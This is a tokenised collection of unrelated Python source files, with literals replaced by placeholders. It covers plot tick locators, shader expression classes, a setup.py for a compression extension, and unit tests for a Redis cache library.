labels = [ '<STR_LIT>' % x for x in major ] <EOL>
majstep = major [ <NUM_LIT:1> ] - major [ <NUM_LIT:0> ] <EOL>
minor = [ ] <EOL>
minstep = majstep / ( minor_num + <NUM_LIT:1> ) <EOL>
minstart = <NUM_LIT:0> if self . axis . _stop_at_major [ <NUM_LIT:0> ] else - <NUM_LIT:1> <EOL>
minstop = - <NUM_LIT:1> if self . axis . 
_stop_at_major [ <NUM_LIT:1> ] else <NUM_LIT:0> <EOL> for i in range ( minstart , len ( major ) + minstop ) : <EOL> maj = major [ <NUM_LIT:0> ] + i * majstep <EOL> minor . extend ( np . linspace ( maj + minstep , <EOL> maj + majstep - minstep , <EOL> minor_num ) ) <EOL> major_frac = ( major - offset ) / scale <EOL> minor_frac = ( np . array ( minor ) - offset ) / scale <EOL> major_frac = major_frac [ : : - <NUM_LIT:1> ] if flip else major_frac <EOL> use_mask = ( major_frac > - <NUM_LIT> ) & ( major_frac < <NUM_LIT> ) <EOL> major_frac = major_frac [ use_mask ] <EOL> labels = [ l for li , l in enumerate ( labels ) if use_mask [ li ] ] <EOL> minor_frac = minor_frac [ ( minor_frac > - <NUM_LIT> ) & <EOL> ( minor_frac < <NUM_LIT> ) ] <EOL> elif self . axis . scale_type == '<STR_LIT>' : <EOL> return NotImplementedError <EOL> elif self . axis . scale_type == '<STR_LIT>' : <EOL> return NotImplementedError <EOL> return major_frac , minor_frac , labels <EOL> class MaxNLocator ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , nbins = <NUM_LIT:10> , steps = None , trim = True , integer = False , <EOL> symmetric = False , prune = None ) : <EOL> """<STR_LIT>""" <EOL> self . _nbins = int ( nbins ) <EOL> self . _trim = trim <EOL> self . _integer = integer <EOL> self . _symmetric = symmetric <EOL> if prune is not None and prune not in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> raise ValueError ( <EOL> "<STR_LIT>" ) <EOL> self . _prune = prune <EOL> if steps is None : <EOL> steps = [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:6> , <NUM_LIT:8> , <NUM_LIT:10> ] <EOL> else : <EOL> if int ( steps [ - <NUM_LIT:1> ] ) != <NUM_LIT:10> : <EOL> steps = list ( steps ) <EOL> steps . append ( <NUM_LIT:10> ) <EOL> self . _steps = steps <EOL> self . _integer = integer <EOL> if self . _integer : <EOL> self . _steps = [ n for n in self . 
_steps <EOL> if divmod ( n , <NUM_LIT:1> ) [ <NUM_LIT:1> ] < <NUM_LIT> ] <EOL> def bin_boundaries ( self , vmin , vmax ) : <EOL> nbins = self . _nbins <EOL> scale , offset = scale_range ( vmin , vmax , nbins ) <EOL> if self . _integer : <EOL> scale = max ( <NUM_LIT:1> , scale ) <EOL> vmin = vmin - offset <EOL> vmax = vmax - offset <EOL> raw_step = ( vmax - vmin ) / nbins <EOL> scaled_raw_step = raw_step / scale <EOL> best_vmax = vmax <EOL> best_vmin = vmin <EOL> for step in self . _steps : <EOL> if step < scaled_raw_step : <EOL> continue <EOL> step *= scale <EOL> best_vmin = step * divmod ( vmin , step ) [ <NUM_LIT:0> ] <EOL> best_vmax = best_vmin + step * nbins <EOL> if ( best_vmax >= vmax ) : <EOL> break <EOL> if self . _trim : <EOL> extra_bins = int ( divmod ( ( best_vmax - vmax ) , step ) [ <NUM_LIT:0> ] ) <EOL> nbins -= extra_bins <EOL> return ( np . arange ( nbins + <NUM_LIT:1> ) * step + best_vmin + offset ) <EOL> def __call__ ( self ) : <EOL> vmin , vmax = self . axis . get_view_interval ( ) <EOL> return self . tick_values ( vmin , vmax ) <EOL> def tick_values ( self , vmin , vmax ) : <EOL> locs = self . bin_boundaries ( vmin , vmax ) <EOL> prune = self . _prune <EOL> if prune == '<STR_LIT>' : <EOL> locs = locs [ <NUM_LIT:1> : ] <EOL> elif prune == '<STR_LIT>' : <EOL> locs = locs [ : - <NUM_LIT:1> ] <EOL> elif prune == '<STR_LIT>' : <EOL> locs = locs [ <NUM_LIT:1> : - <NUM_LIT:1> ] <EOL> return locs <EOL> def view_limits ( self , dmin , dmax ) : <EOL> if self . _symmetric : <EOL> maxabs = max ( abs ( dmin ) , abs ( dmax ) ) <EOL> dmin = - maxabs <EOL> dmax = maxabs <EOL> return np . take ( self . 
bin_boundaries ( dmin , dmax ) , [ <NUM_LIT:0> , - <NUM_LIT:1> ] ) <EOL> def scale_range ( vmin , vmax , n = <NUM_LIT:1> , threshold = <NUM_LIT:100> ) : <EOL> dv = abs ( vmax - vmin ) <EOL> if dv == <NUM_LIT:0> : <EOL> return <NUM_LIT:1.0> , <NUM_LIT:0.0> <EOL> meanv = <NUM_LIT:0.5> * ( vmax + vmin ) <EOL> if abs ( meanv ) / dv < threshold : <EOL> offset = <NUM_LIT:0> <EOL> elif meanv > <NUM_LIT:0> : <EOL> ex = divmod ( np . log10 ( meanv ) , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> offset = <NUM_LIT:10> ** ex <EOL> else : <EOL> ex = divmod ( np . log10 ( - meanv ) , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> offset = - <NUM_LIT:10> ** ex <EOL> ex = divmod ( np . log10 ( dv / n ) , <NUM_LIT:1> ) [ <NUM_LIT:0> ] <EOL> scale = <NUM_LIT:10> ** ex <EOL> return scale , offset <EOL> def _coverage ( dmin , dmax , lmin , lmax ) : <EOL> return <NUM_LIT:1> - <NUM_LIT:0.5> * ( ( dmax - lmax ) ** <NUM_LIT:2> + <EOL> ( dmin - lmin ) ** <NUM_LIT:2> ) / ( <NUM_LIT:0.1> * ( dmax - dmin ) ) ** <NUM_LIT:2> <EOL> def _coverage_max ( dmin , dmax , span ) : <EOL> range_ = dmax - dmin <EOL> if span <= range_ : <EOL> return <NUM_LIT:1.> <EOL> else : <EOL> half = ( span - range_ ) / <NUM_LIT> <EOL> return <NUM_LIT:1> - half ** <NUM_LIT:2> / ( <NUM_LIT:0.1> * range_ ) ** <NUM_LIT:2> <EOL> def _density ( k , m , dmin , dmax , lmin , lmax ) : <EOL> r = ( k - <NUM_LIT:1.0> ) / ( lmax - lmin ) <EOL> rt = ( m - <NUM_LIT:1.0> ) / ( max ( lmax , dmax ) - min ( lmin , dmin ) ) <EOL> return <NUM_LIT:2> - max ( r / rt , rt / r ) <EOL> def _density_max ( k , m ) : <EOL> return <NUM_LIT:2> - ( k - <NUM_LIT:1.0> ) / ( m - <NUM_LIT:1.0> ) if k >= m else <NUM_LIT:1.> <EOL> def _simplicity ( q , Q , j , lmin , lmax , lstep ) : <EOL> eps = <NUM_LIT> <EOL> n = len ( Q ) <EOL> i = Q . 
index ( q ) + <NUM_LIT:1> <EOL> if ( ( lmin % lstep ) < eps or <EOL> ( lstep - lmin % lstep ) < eps ) and lmin <= <NUM_LIT:0> and lmax >= <NUM_LIT:0> : <EOL> v = <NUM_LIT:1> <EOL> else : <EOL> v = <NUM_LIT:0> <EOL> return ( n - i ) / ( n - <NUM_LIT:1.0> ) + v - j <EOL> def _simplicity_max ( q , Q , j ) : <EOL> n = len ( Q ) <EOL> i = Q . index ( q ) + <NUM_LIT:1> <EOL> return ( n - i ) / ( n - <NUM_LIT:1.0> ) + <NUM_LIT:1.> - j <EOL> def _get_ticks_talbot ( dmin , dmax , n_inches , density = <NUM_LIT:1.> ) : <EOL> n_inches = max ( n_inches , <NUM_LIT> ) <EOL> m = density * n_inches + <NUM_LIT:1.0> <EOL> only_inside = False <EOL> Q = [ <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:3> ] <EOL> w = [ <NUM_LIT> , <NUM_LIT> , <NUM_LIT:0.5> , <NUM_LIT> ] <EOL> best_score = - <NUM_LIT> <EOL> best = None <EOL> j = <NUM_LIT:1.0> <EOL> n_max = <NUM_LIT:1000> <EOL> while j < n_max : <EOL> for q in Q : <EOL> sm = _simplicity_max ( q , Q , j ) <EOL> if w [ <NUM_LIT:0> ] * sm + w [ <NUM_LIT:1> ] + w [ <NUM_LIT:2> ] + w [ <NUM_LIT:3> ] < best_score : <EOL> j = n_max <EOL> break <EOL> k = <NUM_LIT> <EOL> while k < n_max : <EOL> dm = _density_max ( k , n_inches ) <EOL> if w [ <NUM_LIT:0> ] * sm + w [ <NUM_LIT:1> ] + w [ <NUM_LIT:2> ] * dm + w [ <NUM_LIT:3> ] < best_score : <EOL> break <EOL> delta = ( dmax - dmin ) / ( k + <NUM_LIT:1.0> ) / j / q <EOL> z = np . ceil ( np . log10 ( delta ) ) <EOL> while z < float ( '<STR_LIT>' ) : <EOL> step = j * q * <NUM_LIT:10> ** z <EOL> cm = _coverage_max ( dmin , dmax , step * ( k - <NUM_LIT:1.0> ) ) <EOL> if ( w [ <NUM_LIT:0> ] * sm + <EOL> w [ <NUM_LIT:1> ] * cm + <EOL> w [ <NUM_LIT:2> ] * dm + <EOL> w [ <NUM_LIT:3> ] < best_score ) : <EOL> break <EOL> min_start = np . floor ( dmax / step ) * j - ( k - <NUM_LIT:1.0> ) * j <EOL> max_start = np . 
ceil ( dmin / step ) * j <EOL> if min_start > max_start : <EOL> z = z + <NUM_LIT:1> <EOL> break <EOL> for start in range ( int ( min_start ) , int ( max_start ) + <NUM_LIT:1> ) : <EOL> lmin = start * ( step / j ) <EOL> lmax = lmin + step * ( k - <NUM_LIT:1.0> ) <EOL> lstep = step <EOL> s = _simplicity ( q , Q , j , lmin , lmax , lstep ) <EOL> c = _coverage ( dmin , dmax , lmin , lmax ) <EOL> d = _density ( k , m , dmin , dmax , lmin , lmax ) <EOL> l = <NUM_LIT:1.> <EOL> score = w [ <NUM_LIT:0> ] * s + w [ <NUM_LIT:1> ] * c + w [ <NUM_LIT:2> ] * d + w [ <NUM_LIT:3> ] * l <EOL> if ( score > best_score and <EOL> ( not only_inside or ( lmin >= dmin and <EOL> lmax <= dmax ) ) ) : <EOL> best_score = score <EOL> best = ( lmin , lmax , lstep , q , k ) <EOL> z += <NUM_LIT:1> <EOL> k += <NUM_LIT:1> <EOL> if k == n_max : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> j += <NUM_LIT:1> <EOL> if j == n_max : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> if best is None : <EOL> raise RuntimeError ( '<STR_LIT>' ) <EOL> return np . arange ( best [ <NUM_LIT:4> ] ) * best [ <NUM_LIT:2> ] + best [ <NUM_LIT:0> ] </s>
<s> """<STR_LIT>""" <EOL> from __future__ import division <EOL> from . component import VisualComponent <EOL> from . . shaders import Varying <EOL> class GridContourComponent ( VisualComponent ) : <EOL> """<STR_LIT>""" <EOL> SHADERS = dict ( <EOL> frag_color = """<STR_LIT>""" , <EOL> vert_post_hook = """<STR_LIT>""" ) <EOL> def __init__ ( self , spacing ) : <EOL> super ( GridContourComponent , self ) . __init__ ( ) <EOL> self . spacing = spacing <EOL> var = Varying ( '<STR_LIT>' , dtype = '<STR_LIT>' ) <EOL> self . _funcs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = var <EOL> self . _funcs [ '<STR_LIT>' ] [ '<STR_LIT>' ] = var <EOL> @ property <EOL> def color ( self ) : <EOL> return self . _color <EOL> @ color . setter <EOL> def color ( self , c ) : <EOL> self . _color = c <EOL> def activate ( self , program , mode ) : <EOL> ff = self . _funcs [ '<STR_LIT>' ] <EOL> ff [ '<STR_LIT>' ] = self . spacing <EOL> class ShadingComponent ( VisualComponent ) : <EOL> """<STR_LIT>""" <EOL> SHADERS = dict ( <EOL> frag_color = """<STR_LIT>""" ) <EOL> def __init__ ( self , normal_comp , lights , ambient = <NUM_LIT> ) : <EOL> super ( ShadingComponent , self ) . __init__ ( ) <EOL> self . normal_comp = normal_comp <EOL> self . _deps = [ normal_comp ] <EOL> self . lights = lights <EOL> self . ambient = ambient <EOL> def activate ( self , program , mode ) : <EOL> ff = self . _funcs [ '<STR_LIT>' ] <EOL> ff [ '<STR_LIT>' ] = self . normal_comp . normal_shader ( ) <EOL> ff [ '<STR_LIT>' ] = tuple ( self . lights [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] [ : <NUM_LIT:3> ] ) + ( <NUM_LIT:1> , ) <EOL> ff [ '<STR_LIT>' ] = tuple ( self . lights [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] [ : <NUM_LIT:3> ] ) + ( <NUM_LIT:1> , ) <EOL> ff [ '<STR_LIT>' ] = self . ambient </s>
<s> from ... ext . six import string_types <EOL> from . shader_object import ShaderObject <EOL> class Expression ( ShaderObject ) : <EOL> """<STR_LIT>""" <EOL> def definition ( self , names ) : <EOL> return None <EOL> class TextExpression ( Expression ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , text ) : <EOL> super ( TextExpression , self ) . __init__ ( ) <EOL> if not isinstance ( text , string_types ) : <EOL> raise TypeError ( "<STR_LIT>" ) <EOL> self . _text = text <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . text , id ( self ) ) <EOL> def expression ( self , names = None ) : <EOL> return self . _text <EOL> @ property <EOL> def text ( self ) : <EOL> return self . _text <EOL> @ text . setter <EOL> def text ( self , t ) : <EOL> self . _text = t <EOL> self . changed ( ) <EOL> def __eq__ ( self , a ) : <EOL> if isinstance ( a , TextExpression ) : <EOL> return a . _text == self . _text <EOL> elif isinstance ( a , string_types ) : <EOL> return a == self . _text <EOL> else : <EOL> return False <EOL> def __hash__ ( self ) : <EOL> return self . _text . __hash__ ( ) <EOL> class FunctionCall ( Expression ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , function , args ) : <EOL> from . function import Function <EOL> super ( FunctionCall , self ) . __init__ ( ) <EOL> if not isinstance ( function , Function ) : <EOL> raise TypeError ( '<STR_LIT>' ) <EOL> sig_len = len ( function . args ) <EOL> if len ( args ) != sig_len : <EOL> raise TypeError ( '<STR_LIT>' % <EOL> ( function . name , sig_len , len ( args ) ) ) <EOL> sig = function . args <EOL> self . _function = function <EOL> self . _args = [ ShaderObject . create ( arg , ref = sig [ i ] [ <NUM_LIT:1> ] ) <EOL> for i , arg in enumerate ( args ) ] <EOL> self . _add_dep ( function ) <EOL> for arg in self . _args : <EOL> self . _add_dep ( arg ) <EOL> def __repr__ ( self ) : <EOL> return '<STR_LIT>' % ( self . function . 
name , id ( self ) ) <EOL> @ property <EOL> def function ( self ) : <EOL> return self . _function <EOL> @ property <EOL> def dtype ( self ) : <EOL> return self . _function . rtype <EOL> def expression ( self , names ) : <EOL> str_args = [ arg . expression ( names ) for arg in self . _args ] <EOL> args = '<STR_LIT:U+002CU+0020>' . join ( str_args ) <EOL> fname = self . function . expression ( names ) <EOL> return '<STR_LIT>' % ( fname , args ) </s>
<s> from . text import TextVisual </s>
<s> from __future__ import absolute_import <EOL> from sys import version_info as v <EOL> if any ( [ v < ( <NUM_LIT:2> , <NUM_LIT:6> ) , ( <NUM_LIT:3> , ) < v < ( <NUM_LIT:3> , <NUM_LIT:3> ) ] ) : <EOL> raise Exception ( "<STR_LIT>" <EOL> "<STR_LIT>" % v [ : <NUM_LIT:2> ] ) <EOL> import os <EOL> from os . path import abspath <EOL> import sys <EOL> from setuptools import setup , Extension , find_packages <EOL> from setuptools . command . build_ext import build_ext <EOL> __builtins__ . __NUMPY_SETUP__ = False <EOL> class BuildExtNumpyInc ( build_ext ) : <EOL> def build_extensions ( self ) : <EOL> from numpy . distutils . misc_util import get_numpy_include_dirs <EOL> for e in self . extensions : <EOL> e . include_dirs . extend ( get_numpy_include_dirs ( ) ) <EOL> build_ext . build_extensions ( self ) <EOL> CFLAGS = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) <EOL> LFLAGS = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) . split ( ) <EOL> BLOSC_DIR = os . environ . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> inc_dirs = [ abspath ( '<STR_LIT>' ) ] <EOL> lib_dirs = [ ] <EOL> libs = [ ] <EOL> def_macros = [ ] <EOL> sources = [ '<STR_LIT>' ] <EOL> optional_libs = [ ] <EOL> args = sys . argv [ : ] <EOL> for arg in args : <EOL> if arg . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> BLOSC_DIR = os . path . expanduser ( arg . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> ] ) <EOL> sys . argv . remove ( arg ) <EOL> if arg . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> LFLAGS = arg . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> ] . split ( ) <EOL> sys . argv . remove ( arg ) <EOL> if arg . find ( '<STR_LIT>' ) == <NUM_LIT:0> : <EOL> CFLAGS = arg . split ( '<STR_LIT:=>' ) [ <NUM_LIT:1> ] . split ( ) <EOL> sys . argv . remove ( arg ) <EOL> tests_require = [ ] <EOL> if v < ( <NUM_LIT:3> , ) : <EOL> tests_require . extend ( [ '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if os . getenv ( '<STR_LIT>' ) and os . 
getenv ( '<STR_LIT>' ) and v [ <NUM_LIT:0> : <NUM_LIT:2> ] == ( <NUM_LIT:2> , <NUM_LIT:7> ) : <EOL> CFLAGS . extend ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> LFLAGS . append ( "<STR_LIT>" ) <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> long_description = """<STR_LIT>""" , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> maintainer = '<STR_LIT>' , <EOL> maintainer_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> platforms = [ '<STR_LIT>' ] , <EOL> ext_modules = [ <EOL> Extension ( <EOL> '<STR_LIT>' , <EOL> include_dirs = inc_dirs , <EOL> define_macros = def_macros , <EOL> sources = sources , <EOL> library_dirs = lib_dirs , <EOL> libraries = libs , <EOL> extra_link_args = LFLAGS , <EOL> extra_compile_args = CFLAGS <EOL> ) <EOL> ] , <EOL> cmdclass = { '<STR_LIT>' : BuildExtNumpyInc } , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> setup_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] , <EOL> tests_require = tests_require , <EOL> extras_require = dict ( <EOL> optional = [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> test = tests_require <EOL> ) , <EOL> packages = find_packages ( ) , <EOL> package_data = { '<STR_LIT>' : [ '<STR_LIT>' ] } , <EOL> zip_safe = True <EOL> ) </s>
<s> from datetime import timedelta <EOL> from rediscache import SimpleCache , RedisConnect , cache_it , cache_it_json , CacheMissException , ExpiredKeyException , DoNotCache <EOL> from unittest import TestCase , main <EOL> import time <EOL> class ComplexNumber ( object ) : <EOL> def __init__ ( self , real , imag ) : <EOL> self . real = real <EOL> self . imag = imag <EOL> def __eq__ ( self , other ) : <EOL> return self . real == other . real and self . imag == other . imag <EOL> class SimpleCacheTest ( TestCase ) : <EOL> def setUp ( self ) : <EOL> self . c = SimpleCache ( <NUM_LIT:10> ) <EOL> self . assertIsNotNone ( self . c . connection ) <EOL> self . redis = RedisConnect ( ) . connect ( ) <EOL> def test_expire ( self ) : <EOL> quick_c = SimpleCache ( ) <EOL> quick_c . store ( "<STR_LIT:foo>" , "<STR_LIT:bar>" , expire = <NUM_LIT:1> ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . assertRaises ( ExpiredKeyException , quick_c . get , "<STR_LIT:foo>" ) <EOL> quick_c . flush ( ) <EOL> quick_c . store ( "<STR_LIT:foo>" , "<STR_LIT:bar>" , expire = timedelta ( seconds = <NUM_LIT:1> ) ) <EOL> time . sleep ( <NUM_LIT> ) <EOL> self . assertRaises ( ExpiredKeyException , quick_c . get , "<STR_LIT:foo>" ) <EOL> quick_c . flush ( ) <EOL> def test_miss ( self ) : <EOL> self . assertRaises ( CacheMissException , self . c . get , "<STR_LIT>" ) <EOL> def test_kwargs_decorator ( self ) : <EOL> @ cache_it_json ( cache = self . c ) <EOL> def add_it ( a , b = <NUM_LIT:10> , c = <NUM_LIT:5> ) : <EOL> return a + b + c <EOL> add_it ( <NUM_LIT:3> ) <EOL> self . assertEqual ( add_it ( <NUM_LIT:3> ) , <NUM_LIT> ) <EOL> add_it ( <NUM_LIT:5> , b = <NUM_LIT:7> ) <EOL> self . assertEqual ( add_it ( <NUM_LIT:5> , b = <NUM_LIT:7> ) , <NUM_LIT> ) <EOL> add_it ( <NUM_LIT:6> , c = <NUM_LIT:3> ) <EOL> self . assertEqual ( add_it ( <NUM_LIT:6> , c = <NUM_LIT:3> ) , <NUM_LIT> ) <EOL> def test_store_retrieve ( self ) : <EOL> self . c . store ( "<STR_LIT:foo>" , "<STR_LIT:bar>" ) <EOL> foo = self . c . 
get ( "<STR_LIT:foo>" ) <EOL> self . assertEqual ( foo , "<STR_LIT:bar>" ) <EOL> def test_json ( self ) : <EOL> payload = { "<STR_LIT>" : "<STR_LIT:data>" } <EOL> self . c . store_json ( "<STR_LIT>" , payload ) <EOL> self . assertEqual ( self . c . get_json ( "<STR_LIT>" ) , payload ) <EOL> def test_pickle ( self ) : <EOL> payload = ComplexNumber ( <NUM_LIT:3> , <NUM_LIT:4> ) <EOL> self . c . store_pickle ( "<STR_LIT>" , payload ) <EOL> self . assertEqual ( self . c . get_pickle ( "<STR_LIT>" ) , payload ) <EOL> def test_decorator ( self ) : <EOL> self . redis . flushall ( ) <EOL> mutable = [ ] <EOL> @ cache_it ( cache = self . c ) <EOL> def append ( n ) : <EOL> mutable . append ( n ) <EOL> return mutable <EOL> append ( <NUM_LIT:1> ) <EOL> len_before = len ( mutable ) <EOL> mutable_cached = append ( <NUM_LIT:1> ) <EOL> len_after = len ( mutable ) <EOL> self . assertEqual ( len_before , len_after ) <EOL> self . assertNotEqual ( id ( mutable ) , id ( mutable_cached ) ) <EOL> self . assertEqual ( mutable , mutable_cached ) <EOL> def test_decorator_do_not_cache ( self ) : <EOL> @ cache_it ( cache = self . c ) <EOL> def test_no_cache ( n ) : <EOL> result = n * <NUM_LIT:10> <EOL> raise DoNotCache ( result ) <EOL> keys_before = len ( self . c . keys ( ) ) <EOL> r1 = test_no_cache ( <NUM_LIT:20> ) <EOL> r2 = test_no_cache ( <NUM_LIT:10> ) <EOL> r3 = test_no_cache ( <NUM_LIT:30> ) <EOL> r4 = test_no_cache ( <NUM_LIT:20> ) <EOL> self . assertEqual ( r1 , ( <NUM_LIT:10> * <NUM_LIT:20> ) ) <EOL> self . assertEqual ( r2 , ( <NUM_LIT:10> * <NUM_LIT:10> ) ) <EOL> self . assertEqual ( r3 , ( <NUM_LIT:10> * <NUM_LIT:30> ) ) <EOL> self . assertEqual ( r4 , ( <NUM_LIT:10> * <NUM_LIT:20> ) ) <EOL> keys_after = len ( self . c . keys ( ) ) <EOL> self . assertEqual ( keys_before , keys_after ) <EOL> def test_decorator_do_not_cache_reraised ( self ) : <EOL> @ cache_it ( cache = self . 
c ) <EOL> def test_no_cache ( n ) : <EOL> result = n * <NUM_LIT:10> <EOL> try : <EOL> raise DoNotCache ( result ) <EOL> except DoNotCache as e : <EOL> raise e <EOL> except Exception : <EOL> pass <EOL> keys_before = len ( self . c . keys ( ) ) <EOL> r1 = test_no_cache ( <NUM_LIT:20> ) <EOL> r2 = test_no_cache ( <NUM_LIT:10> ) <EOL> r3 = test_no_cache ( <NUM_LIT:30> ) <EOL> r4 = test_no_cache ( <NUM_LIT:20> ) <EOL> self . assertEqual ( r1 , ( <NUM_LIT:10> * <NUM_LIT:20> ) ) <EOL> self . assertEqual ( r4 , ( <NUM_LIT:10> * <NUM_LIT:20> ) ) <EOL> self . assertEqual ( r2 , ( <NUM_LIT:10> * <NUM_LIT:10> ) ) <EOL> self . assertEqual ( r3 , ( <NUM_LIT:10> * <NUM_LIT:30> ) ) <EOL> keys_after = len ( self . c . keys ( ) ) <EOL> self . assertEqual ( keys_before , keys_after ) <EOL> def test_decorator_do_not_cache_wrapping_exception ( self ) : <EOL> @ cache_it ( cache = self . c ) <EOL> def test_no_cache ( n ) : <EOL> try : <EOL> result = n / <NUM_LIT:0> <EOL> except ZeroDivisionError as e : <EOL> raise DoNotCache ( e ) <EOL> keys_before = len ( self . c . keys ( ) ) <EOL> r1 = test_no_cache ( <NUM_LIT:20> ) <EOL> self . assertTrue ( isinstance ( r1 , ZeroDivisionError ) ) <EOL> keys_after = len ( self . c . keys ( ) ) <EOL> self . assertEqual ( keys_before , keys_after ) <EOL> def test_decorator_json ( self ) : <EOL> import random <EOL> mutable = { } <EOL> @ cache_it_json ( cache = self . c ) <EOL> def set_key ( n ) : <EOL> mutable [ str ( random . random ( ) ) ] = n <EOL> return mutable <EOL> set_key ( '<STR_LIT:a>' ) <EOL> len_before = len ( mutable ) <EOL> mutable_cached = set_key ( '<STR_LIT:a>' ) <EOL> len_after = len ( mutable ) <EOL> self . assertEqual ( len_before , len_after ) <EOL> self . assertNotEqual ( id ( mutable ) , id ( mutable_cached ) ) <EOL> self . assertEqual ( mutable , mutable_cached ) <EOL> def test_decorator_complex_type ( self ) : <EOL> import math <EOL> @ cache_it ( cache = self . c ) <EOL> def add ( x , y ) : <EOL> return ComplexNumber ( x . 
real + y . real , x . imag + y . imag ) <EOL> result = add ( ComplexNumber ( <NUM_LIT:3> , <NUM_LIT:4> ) , ComplexNumber ( <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> result_cached = add ( ComplexNumber ( <NUM_LIT:3> , <NUM_LIT:4> ) , ComplexNumber ( <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> self . assertNotEqual ( id ( result ) , id ( result_cached ) ) <EOL> self . assertEqual ( result , result_cached ) <EOL> self . assertEqual ( result , complex ( <NUM_LIT:3> , <NUM_LIT:4> ) + complex ( <NUM_LIT:4> , <NUM_LIT:5> ) ) <EOL> def test_cache_limit ( self ) : <EOL> for i in range ( <NUM_LIT:100> ) : <EOL> self . c . store ( "<STR_LIT>" % i , "<STR_LIT>" ) <EOL> self . failUnless ( len ( self . c ) <= <NUM_LIT:10> ) <EOL> self . failUnless ( len ( self . c . keys ( ) ) <= <NUM_LIT:10> ) <EOL> def test_flush ( self ) : <EOL> connection = self . c . connection <EOL> connection . set ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> self . c . store ( "<STR_LIT>" , '<STR_LIT>' ) <EOL> len_before = len ( self . c ) <EOL> len_keys_before = len ( connection . keys ( self . c . make_key ( "<STR_LIT:*>" ) ) ) <EOL> self . c . flush ( ) <EOL> len_after = len ( self . c ) <EOL> len_keys_after = connection . get ( "<STR_LIT>" ) <EOL> self . assertTrue ( len_before > <NUM_LIT:0> ) <EOL> self . assertEqual ( len_after , <NUM_LIT:0> ) <EOL> self . assertTrue ( len_keys_before > <NUM_LIT:0> ) <EOL> self . assertEqual ( len_keys_after , '<STR_LIT>' ) <EOL> self . assertEqual ( connection . get ( "<STR_LIT>" ) , '<STR_LIT>' ) <EOL> connection . delete ( "<STR_LIT>" ) <EOL> def test_flush_namespace ( self ) : <EOL> self . redis . flushall ( ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> len_keys_before = len ( self . c . keys ( ) ) <EOL> self . c . flush_namespace ( '<STR_LIT:foo>' ) <EOL> len_keys_after = len ( self . c . keys ( ) ) <EOL> self . 
assertEqual ( ( len_keys_before - len_keys_after ) , <NUM_LIT:2> ) <EOL> self . assertEqual ( self . c . get ( '<STR_LIT>' ) , '<STR_LIT>' ) <EOL> self . assertRaises ( CacheMissException , self . c . get , "<STR_LIT>" ) <EOL> self . assertRaises ( CacheMissException , self . c . get , "<STR_LIT>" ) <EOL> self . c . flush ( ) <EOL> def test_flush_multiple ( self ) : <EOL> c1 = SimpleCache ( <NUM_LIT:10> , namespace = __name__ ) <EOL> c2 = SimpleCache ( <NUM_LIT:10> ) <EOL> c1 . store ( "<STR_LIT:foo>" , "<STR_LIT:bar>" ) <EOL> c2 . store ( "<STR_LIT:foo>" , "<STR_LIT:bar>" ) <EOL> c1 . flush ( ) <EOL> self . assertEqual ( len ( c1 ) , <NUM_LIT:0> ) <EOL> self . assertEqual ( len ( c2 ) , <NUM_LIT:1> ) <EOL> c2 . flush ( ) <EOL> def test_expire_all_in_set ( self ) : <EOL> self . c . store ( "<STR_LIT:foo>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . c . store ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> self . assertEqual ( self . c . expire_all_in_set ( ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) ) <EOL> self . assertRaises ( ExpiredKeyException , self . c . get , "<STR_LIT:foo>" ) <EOL> self . assertRaises ( ExpiredKeyException , self . c . get , "<STR_LIT>" ) <EOL> self . assertRaises ( ExpiredKeyException , self . c . get , "<STR_LIT>" ) 